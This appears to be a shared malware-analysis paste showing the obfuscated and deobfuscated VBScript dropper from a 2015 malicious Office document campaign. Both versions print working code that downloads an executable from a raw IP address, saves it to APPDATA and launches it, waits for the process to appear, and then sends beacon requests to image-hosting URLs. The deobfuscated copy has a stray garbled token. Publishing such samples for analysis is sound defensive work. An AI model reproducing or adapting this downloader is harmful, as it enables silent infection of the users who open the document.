Deobfuscated VBscript

1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
3.  
4.  
5. <== obfuscated: ===>
6. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
7. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
8. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
9. HGyu87f7Usf.Send
10. Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
11. iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
12. iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
13. with oUIOGuiwefff
14.    .type = 1  
15.     .open
16.     .write HGyu87f7Usf.responseBody
17.     .savetofile iyUGUIvbuiwe7vhJ, 2  
18. end with
19. Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
20. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
21.  
22. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
23. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
24. JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
25. JHyygUBjdfg.Send
26.  
27. Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
28. Do
29. Running = False
30. Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
31. For Each objItem In colItems
32. If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  Then
33. Running = True
34. Exit For
35. End If
36. Next
37. If Not Running Then
38. WScript.Sleep 3000
39. End If
40. Loop While Not Running
41. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
42. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
43. sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
44. sdfsdfsdf.Send
45.  
46.  
47. =========================================================================================================
48.  
49.  
50.  
51. <== deobfuscated: ===>
52. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
53. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
54. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
55. HGyu87f7Usf.Send
56. Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
57. iyUGbuwerff = dfgfderer(APPDATA )
58. iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
59. with oUIOGuiwefff
60.    .type = 1
61.     .open
62.     .write HGyu87f7Usf.responseBody
63.     .savetofile iyUGUIvbuiwe7vhJ, 2
64. end with
65. Set uyGUYhi8wef = CreateObject(Shell.Application )
66. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
67.  
68. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
69. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
70. JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
71. JHyygUBjdfg.Send
72.  
73. Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
74. Do
75. Running = Falsepasteb
76. Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
77. For Each objItem In colItems
78. If objItem.Name = o8237423.exe  Then
79. Running = True
80. Exit For
81. End If
82. Next
83. If Not Running Then
84. WScript.Sleep 3000
85. End If
86. Loop While Not Running
87. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
88. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
89. sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
90. sdfsdfsdf.Send